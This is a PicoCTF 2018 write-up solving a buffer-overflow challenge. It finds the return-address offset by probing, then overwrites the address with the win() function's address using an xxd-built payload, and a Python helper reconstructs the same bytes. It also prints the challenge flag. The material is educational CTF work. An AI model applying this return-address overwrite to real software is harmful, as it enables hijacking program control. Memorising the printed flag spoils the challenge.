PicoCTF 2018 Writeup: Binary Exploitation 200: buffer overflow 1

Challenge
Okay now you’re cooking! This time can you overflow the buffer and return to the flag function in this program? You can find it in /problems/buffer-overflow-1_2_86cbe4de3cdc8986063c379e61f669ba on the shell server. Source.

Solution
Using an entirely manual binary search, we find out which bytes of the input we actually control:

hxr@pico-2018-shell-1:/problems/buffer-overflow-1_2_86cbe4de3cdc8986063c379e61f669ba$ ./vuln
Please enter your string:
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaab
Okay, time to return... Fingers Crossed... Jumping to 0x62616161
Segmentation fault
...
hxr@pico-2018-shell-1:/problems/buffer-overflow-1_2_86cbe4de3cdc8986063c379e61f669ba$ ./vuln
Please enter your string:
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaadcba
Okay, time to return... Fingers Crossed... Jumping to 0x61626364
Segmentation fault

OK, good. Now that we control the return address, we just need to point it at wherever the flag is printed. I guess that's the win function:

$ objdump -x -d vuln
....

080485cb <win>:
 80485cb:       55                      push   %ebp
 80485cc:       89 e5                   mov    %esp,%ebp
 80485ce:       83 ec 58                sub    $0x58,%esp
 80485d1:       83 ec 08                sub    $0x8,%esp
 80485d4:       68 50 87 04 08          push   $0x8048750
 80485d9:       68 52 87 04 08          push   $0x8048752
 80485de:       e8 bd fe ff ff          call   80484a0 <fopen@plt>
 80485e3:       83 c4 10                add    $0x10,%esp
 80485e6:       89 45 f4                mov    %eax,-0xc(%ebp)
 80485e9:       83 7d f4 00             cmpl   $0x0,-0xc(%ebp)
 80485ed:       75 1a                   jne    8048609 <win+0x3e>
 80485ef:       83 ec 0c                sub    $0xc,%esp
...

So we want to return to 0x080485cb.

First I experimented with some known characters in order to figure out the byte mapping, because xxd -r does not handle the little-endian byte order for us:

$ echo -n 'ÏÖ' | xxd -e # Little endian
00000000: 96c38fc3                             ....
$ echo -n 'ÏÖ' | xxd    # Big endian
00000000: c38f c396                                ....
$ # 080485cb < our target string
$ echo '00000000: cb85 0408' | xxd -r
$ # And the mapping is a bunch of unprintable characters.

This address needs to be prefixed with the known length of padding, so we'll just construct a hexdump that xxd -r is happy with:

00000000: 61616161 61616161 61616161 61616161
00000010: 61616161 61616161 61616161 61616161
00000020: 61616161 61616161 61616161 cb850408

And then run this on the server:

$ echo '00000000: 61616161 61616161 61616161 61616161
00000010: 61616161 61616161 61616161 61616161
00000020: 61616161 61616161 61616161 cb850408' | xxd -r | ./vuln
Please enter your string:
Okay, time to return... Fingers Crossed... Jumping to 0x80485cb
picoCTF{addr3ss3s_ar3_3asy56a7b196}Segmentation fault

It works!!!
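As an added illustration (not part of the original writeup), the Python below reproduces the two inferences made above: how the "Jumping to 0x..." value maps back onto the input bytes that overwrote the saved return address, which is what reveals the offset, and how the win() address has to be laid out in little-endian byte order, the step xxd -r would not do for us. The probe strings, the crash addresses and 0x080485cb are the values from this writeup; the function names are mine.

```python
import struct

# Values observed in the writeup above (not constructed): the probes sent to
# ./vuln and the "Jumping to 0x..." addresses it printed back, plus the win()
# address taken from the objdump listing.
WIN_ADDR = 0x080485cb
PROBES = [
    (b"a" * 47 + b"b", 0x62616161),
    (b"a" * 44 + b"dcba", 0x61626364),
]


def pack_return_address(addr: int) -> bytes:
    """Lay a 32-bit address out as x86 stores it on the stack: least
    significant byte first. This is the conversion xxd -r does not perform."""
    return struct.pack("<I", addr)


def bytes_landed_in_eip(jump_target: int) -> bytes:
    """Invert the mapping: the value vuln printed as 'Jumping to 0x...' is the
    four overwritten return-address bytes read back as a little-endian int."""
    return struct.pack("<I", jump_target)


def return_address_offset(sent: bytes, jump_target: int) -> int:
    """Where in the input do the bytes that reached EIP start? Raises if the
    printed target is not made of our input (the overflow did not reach it)."""
    landed = bytes_landed_in_eip(jump_target)
    offset = sent.find(landed)
    if offset < 0:
        raise ValueError(f"{landed!r} not found in input; offset unknown")
    return offset


def build_payload(offset: int, target: int) -> bytes:
    """Padding up to the saved return address, then the target in memory order."""
    return b"a" * offset + pack_return_address(target)


if __name__ == "__main__":
    for sent, seen in PROBES:
        landed = bytes_landed_in_eip(seen)
        print(f"bytes at EIP: {landed!r} -> offset {return_address_offset(sent, seen)}")
    payload = build_payload(return_address_offset(*PROBES[1]), WIN_ADDR)
    print(payload.hex())  # same bytes as the hexdump fed to xxd -r above
```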

Flag

picoCTF{addr3ss3s_ar3_3asy56a7b196}